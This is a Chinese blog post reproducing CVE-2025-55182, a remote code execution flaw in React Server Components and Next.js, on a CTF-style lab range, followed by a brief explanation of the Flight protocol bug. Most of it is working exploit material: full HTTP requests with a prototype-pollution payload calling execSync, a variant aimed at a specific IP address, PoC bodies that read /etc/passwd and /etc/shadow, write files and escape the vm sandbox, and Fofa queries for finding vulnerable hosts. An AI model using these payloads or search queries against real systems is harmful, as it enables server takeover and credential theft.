CVE-2025-55182复现

CVE-2025-55182复现
使用的是春秋云镜靶场进行的复现先讲怎么利用poc的然后在来探讨整个漏洞的形成、复现首先对网页进行一个抓包GET /install HTTP/2 Host: eci-2zeck0otubcneyef2pbq.cloudeci1.ichunqiu.com:3000 Cookie: localezh-Hans Cache-Control: max-age0 Sec-Ch-Ua: Chromium;v143, Not A(Brand;v24 Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: Windows Accept-Language: zh-CN,zh;q0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Priority: u0, i![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/652b87a6ea59403c9d7bb0604d333386.png)然后根据poc进行一个改包POST /apps HTTP/2 Host: eci-2zeck0otubcneyef2pbq.cloudeci1.ichunqiu.com:3000 Cookie: localezh-Hans Cache-Control: max-age0 Sec-Ch-Ua: Chromium;v143, Not A(Brand;v24 Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: Windows Accept-Language: zh-CN,zh;q0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Priority: u0, i Next-Action: x X-Nextjs-Request-Id: 91dmljym Content-Type: multipart/form-data; boundary----WebKitFormBoundaryx8jO2oVc6SWP3Sad X-Nextjs-Html-Request-Id: hst51Myl5trXfvWsC9Ay6 Content-Type: application/x-www-form-urlencoded Content-Length: 689 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name0 {then:$1:__proto__:then,status:resolved_model,reason:-1,value:{\then\:\$B1337\},_response:{_prefix:var resprocess.mainModule.require(child_process).execSync(id).toString().trim();;throw Object.assign(new Error(NEXT_REDIRECT),{digest: NEXT_REDIRECT;push;/login?a${res};307;});,_chunks:$Q2,_formData:{get:$1:constructor:constructor}}} ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name1 $0 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name2 [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--然后发现id得到了验证就是验证了漏洞所在所以进行一个cat /flag拿到flag下面的poc就是本次复现的是我之前整合在一起的但是是哪位老师的不记得了pocFofa使用RSC的包含js语法body“react.production.min.js” || body“React.createElement(” || body“React Router” || body“React.js”nextJs语法app“NEXT.JS”difyapp“Dify”漏洞说明任何捆绑了 react-server 实现的框架或库都可能存在漏洞React ServerReact Server 19.0.0React Server 19.0.1React Server 19.1.*React Server 19.2.0Next.jsNext.js v15.0.0 - v15.0.4Next.js v15.1.0 - v15.1.8Next.js v15.2.x -v15.5.6Next.js v16.0.0 - v16.0.6Next.js v14.3.0-canary.77及以上Canary 版本其他用到的框架不全RedwoodSDK、Waku、RedwoodJS (rwsdk)、React RouterRSC 预览版、Parcel RSC 插件 (parcel/rsc)、Vite RSC 插件 (vitejs/plugin-rsc)漏洞攻击链的本质是利用服务器对用户输入验证不严的缺陷通过原型链或其他方式操纵程序的内部逻辑最终调用一个危险的代码执行函数如vm.runInThisContextfs#readFileSync并传入恶意参数最终实现逻辑应该为pocPOST /formaction HTTP/1.1 Host: Content-Type: multipart/form-data; boundary----Boundary Content-Length: 297 ------Boundary Content-Disposition: form-data; name$ACTION_REF_0 ------Boundary Content-Disposition: form-data; name$ACTION_0:0 Content-type:application/json { id: fs#readFileSync, bound: [/etc/shadow] } ------Boundary--dify参考tested on next.js 16.0.6, might need some changes to be applied to other RSC frameworksPOST /apps HTTP/1.1 Host: 43.160.252.242 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0 Next-Action: x X-Nextjs-Request-Id: b5dce965 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryx8jO2oVc6SWP3Sad X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9 Content-Length: 565 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name0 {then:$1:__proto__:then,status:resolved_model,reason:-1,value:{\then\:\$B1337\},_response:{_prefix:var resprocess.mainModule.require(child_process).execSync(id).toString().trim();;throw Object.assign(new Error(NEXT_REDIRECT),{digest: NEXT_REDIRECT;push;/login?a${res};307;});,_chunks:$Q2,_formData:{get:$1:constructor:constructor}}} ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name1 $0 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name2 [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--github上pocejpir/CVE-2025-55182-POCCVE-2025-55182 POC执行shell命令whoami { id: child_process#execSync, bound: [whoami] } 阅读敏感文件 { id: fs#readFileSync, bound: [/etc/passwd] } 写入文件到磁盘 { id: fs#writeFileSync, bound: [/tmp/pwned.txt, CVE-2025-55182] } 执行任意JavaScript { id: vm#runInThisContext, bound: [process.mainModule.require(child_process).execSync(id).toString()] } 沙盒逃逸vm.runInNewContext { id: vm#runInNewContext, bound: [this.constructor.constructor(return process)().mainModule.require(child_process).execSync(whoami).toString()] }利用条件总的来说漏洞利用要满足以下非纯前端使用了React服务端组件RSC功能前后端不可分离简单的说就是全栈框架且使用RSC服务端功能或者使用React SSR和RSC服务才行漏洞学习其实poc上面也提到了只是我可能还想再详细的学习一下协议层React Flight首先网页有三个时代分别是传统网站PHP、JSP浏览器点一下服务器就会返回html语言的整个网页每刷新一次HTML会整个重新生成React SPA不会再次返回整个网页比如浏览器打开index.html只有一次以后的数据都是GET /api/chat ↓ { message:hello }就是json重新渲染dom不会重新返回整个html3. React Server ComponentsFlight拆分成组件树的形式每次就是把组件发给浏览器然后根据组件再去更新相应组件位置服务器收到后的第一件事情就是把Flight还原成JavaScript对象流程Browser │ ▼ Flight Payload │ ▼ Next.js │ ▼ Flight Decoder解析 │ ▼ JavaScript Object │ ▼ Server ActionCVE-2025-55182 的真正核心就发生在恢复JavaScript对象这一步是因为服务器把Flight数据恢复成JavaScript对象时对输入校验不足而导致的